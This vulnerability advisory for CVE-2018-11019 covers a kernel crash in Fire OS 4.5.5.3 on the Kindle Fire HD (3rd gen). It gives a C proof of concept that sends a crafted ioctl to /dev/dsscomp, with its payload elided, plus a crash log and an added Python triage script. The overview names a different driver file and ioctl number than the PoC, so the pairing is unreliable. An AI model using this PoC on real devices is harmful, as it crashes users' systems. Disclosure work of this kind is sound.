(CVE-2018-11019) Amazon Kindle Fire HD (3rd) Fire OS kernel component security vulnerability

I. Vulnerability overview

Amazon Kindle Fire HD (3rd) is a Fire OS tablet device from the US company Amazon. Fire OS is the Android-based mobile operating system, built specifically for Amazon devices, that runs on it. kernel is one of its kernel components. In Fire OS 4.5.5.3 on the Amazon Kindle Fire HD (3rd), the kernel component contains a security vulnerability in the file kernel/omap/drivers/misc/gcx/gcioctl/gcif.c. An attacker can exploit it by using command 3221773726 to inject specially crafted arguments, causing a kernel crash.

II. Affected versions

Fire OS 4.5.5.3

III. Reproduction

poc

    /*
     * This is poc of Kindle Fire HD 3rd
     * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
     * Related buggy struct name is dsscomp_setup_dispc_data.
     * This Poc should run with permission to do ioctl on /dev/dsscomp.
     * The following is kmsg of kernel crash information:
     */
    #include <stdio.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <sys/ioctl.h>

    /* Device node and raw ioctl request number used by the PoC. */
    static const char *driver = "/dev/dsscomp";
    static unsigned int command = 1118064517;

    int main(int argc, char **argv, char **env) {
        /* crafted 32-bit words for struct dsscomp_setup_dispc_data ... */
        unsigned int payload[] = { /* ... */ };
        int fd = 0;

        fd = open(driver, O_RDWR);
        if (fd < 0) {
            /* failure handling: the statement here referenced /data/local/tmp/log */
            return -1;
        }
        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        if (ioctl(fd, command, &payload) < 0) {
            /* failure handling: the statement here referenced /data/local/tmp/log */
            return -1;
        }
        close(fd);
        return 0;
    }

Crash log

    [  164.793151] Unable to handle kernel NULL pointer dereference at virtual address 00000037
    [  164.802459] pgd = c26ec000
    [  164.805664] [00000037] *pgd=82f42831, *pte=00000000, *ppte=00000000
    [  164.813415] Internal error: Oops: 17 [#1] PREEMPT SMP ARM
    [  164.819458] Modules linked in: omaplfb(O) pvrsrvkm(O) pvr_logger(O)
    [  164.827239] CPU: 1    Tainted: G           O  (3.4.83-gd2afc0bae69 #1)
    [  164.834686] PC is at dev_ioctl+0x4ac/0x10c4
    [  164.839416] LR is at down_timeout+0x40/0x5c
    ...
    [  164.877807] Flags: nZCv  IRQs on  FIQs on  Mode SVC_32  ISA ARM  Segment user
    [  164.885894] Control: 10c5387d  Table: 826ec04a  DAC: 00000015
    ...
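As an added triage example (not part of the original advisory or its PoC), the Python below decodes the two ioctl command numbers quoted on this page into their Linux _IOC fields and extracts the fault address and PC/LR symbols from the readable oops lines of the crash log above. The function names, the asm-generic _IOC bit layout assumed for this ARM kernel, and the retyped sample lines are assumptions of this example.

```python
import re

# Assumed layout: asm-generic _IOC encoding (nr 8 bits, type 8, size 14, dir 2).
_DIRS = {0: "none", 1: "write", 2: "read", 3: "read|write"}

def decode_ioctl(cmd):
    """Split a raw ioctl request number into its _IOC fields."""
    return {
        "dir": _DIRS[(cmd >> 30) & 0x3],   # direction as seen from user space
        "size": (cmd >> 16) & 0x3FFF,      # declared size of the argument in bytes
        "type": chr((cmd >> 8) & 0xFF),    # driver "magic" character
        "nr": cmd & 0xFF,                  # command index within the driver
    }

_FAULT = re.compile(r"Unable to handle kernel (.+?) at virtual address ([0-9a-f]{8})")
_SYM = re.compile(r"\b(PC|LR) is at (\w+)\+(0x[0-9a-f]+)/(0x[0-9a-f]+)")

def triage_oops(lines, page_size=4096):
    """Extract fault kind, address and PC/LR symbols from ARM oops lines."""
    report = {}
    for line in lines:
        if (m := _FAULT.search(line)):
            addr = int(m.group(2), 16)
            report["fault"] = m.group(1)
            report["address"] = addr
            # A fault inside the first page usually means a field was accessed
            # through a NULL base pointer; the address is then the field offset.
            report["null_base_offset"] = addr if addr < page_size else None
        elif (m := _SYM.search(line)):
            report[m.group(1).lower()] = (m.group(2), int(m.group(3), 16))
    return report

# Constructed sample: readable lines of the crash log on this page, retyped.
SAMPLE = [
    "[  164.793151] Unable to handle kernel NULL pointer dereference at virtual address 00000037",
    "[  164.813415] Internal error: Oops: 17 [#1] PREEMPT SMP ARM",
    "[  164.834686] PC is at dev_ioctl+0x4ac/0x10c4",
    "[  164.839416] LR is at down_timeout+0x40/0x5c",
]

if __name__ == "__main__":
    for cmd in (3221773726, 1118064517):   # the two command numbers on this page
        print(hex(cmd), decode_ioctl(cmd))
    print(triage_oops(SAMPLE))
```

The decoded type and size fields show which driver magic and argument size each request number declares, which helps match a crash report to the ioctl handler that needs input validation.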